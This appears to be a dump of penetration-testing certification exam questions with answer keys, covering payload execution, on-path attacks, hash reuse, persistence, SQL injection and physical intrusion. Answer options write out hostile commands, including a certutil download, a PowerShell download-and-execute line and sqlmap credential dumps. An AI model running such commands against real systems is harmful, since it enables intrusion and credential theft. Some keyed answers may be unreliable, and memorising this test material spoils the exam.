QUESTION 101
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
A. powershell.exe impo C:toolsfoo.ps1
B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
C. powershell.exe -noni -encode IEX.Downloadstring(“http://172.16.0.1/”)
D. rundl132.exe c:pathfoo.dll, functName
Correct Answer: D
QUESTION 102
A penetration tester is performing a network security assessment The tester wants to intercept communication between two users and then view and potentially modify transmitted data. Which of the following types of on-path attacks would be best to allow the penetration tester to achieve this result?
A. DNS spoofing
B. ARP poisoning
C. VLAN hopping
D. SYN flooding
Correct Answer: B
QUESTION 103
A penetration tester needs to identify all vulnerable input fields on a customer website. Which of the following tools would be best suited to complete this request?
A. DAST
B. SAST
C. IAST
D. SCA
Correct Answer: A
QUESTION 104
During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?
A. Responder
B. Hydra
C. BloodHound
D. CrackMapExec
Correct Answer: D
QUESTION 105
A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?
A. Caldera
B. SpiderFoot
C. Maltego
D. WiGLE.net
Correct Answer: B
QUESTION 106
A penetration tester is conducting an assessment of a web application’s log-in page. The tester needs to determine whether there are any hidden form fields of interest Which of following is the most effective technique?
A. XSS
B. On-path attack
C. SQL injection
D. HTML scraping
Correct Answer: D
QUESTION 107
A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
A. schtasks.exe
B. rundll.exe
C. cmd.exe
D. chgusr.exe
E. sc.exe
F. netsh.exe
Correct Answer: AE
QUESTION 108
Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?
A. Lock picking
B. Impersonating
C. Jamming
D. Tailgating
E. Bypassing
Correct Answer: E
QUESTION 109
A company wants to perform a BAS to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?
A. Infection Monkey
B. Exploit-DB
C. Atomic Red Team
D. Mimikatz
Correct Answer: C
QUESTION 110
A penetration tester runs a network scan but has some issues accurately enumerating the vulnerabilities due to the following error:
OS identification failed
Which of the following is most likely causing this error?
A. The scan did not reach the target because of a firewall block rule.
B. The scanner database is out of date.
C. The scan is reporting a false positive.
D. The scan cannot gather one or more fingerprints from the target.
Correct Answer: D
QUESTION 111
A penetration tester has been asked to conduct a blind web application test against a customer’s corporate website. Which of the following tools would be best suited to perform this assessment?
A. ZAP
B. Nmap
C. Wfuzz
D. Trufflehog
Correct Answer: A
QUESTION 112
A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?
A. SAST
B. Sidecar
C. Unauthenticated
D. Host-based
Correct Answer: C
QUESTION 113
A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network Which of the following techniques would most likely achieve the goal?
A. Packet injection
B. Bluejacking
C. Beacon flooding
D. Signal jamming
Correct Answer: A
QUESTION 114
An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?
A. Privileged & Confidential Status Update
B. Action Required Status Update
C. Important Weekly Status Update
D. Urgent Status Update
Correct Answer: A
QUESTION 115
During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?
A. sqlmap -u wwv.example.com/?id=1 –search -Tuser
B. sqlmap -u www.example.com/?id=1 –dump -D accounts -T users -c cred
C. sqlmap -u www.example.com/?id=1 –tables -D accounts
D. sqImap -u www.example.com/?id=1 –schema –current-user –current-db
Correct Answer: B
QUESTION 116
During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?
A. EXIF
B. GIF
C. COFF
D. ELF
Correct Answer: A
QUESTION 117
A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?
A. Phishing
B. Tailgating
C. Whailing
D. Spear phising
Correct Answer: D
QUESTION 118
A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID connect with OAuth and has dynamic registration enabled. Which of the following attacks should the tester try first?
A. A password-spraying attack against the authentication system
B. A brute-force attack against the authentication system
C. A replay attack against the authentication flow in the system
D. A mask attack against the authentication system
Correct Answer: C
QUESTION 119
Which of the following are valid reasons for including base, temporal, and environmental CVSS metrics in the findings section of a penetration testing report? (Select two).
A. Providing details on how to remediate vulnerabilities
B. Helping to prioritize remediation based on threat context
C. Including links to the proof-of-concept exploit itself
D. Providing information on attack complexity and vector
E. Prioritizing compliance information needed for an audit
F. Adding risk levels to each asset
Correct Answer: BD
QUESTION 120
Which of the following technologies is most likely used with badge cloning? (Select two).
A. NFC
B. RFID
C. Bluetooth
D. Modbus
E. Zigbee
F. CAN bus
Correct Answer: AB
We use cookies to improve your experience, including essential cookies required for the website to function. By continuing, you agree to our use of cookies. Learn more.
We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.
Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.
Advertisement cookies are used to provide visitors with customised advertisements based on the pages you visited previously and to analyse the effectiveness of the ad campaigns.
Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.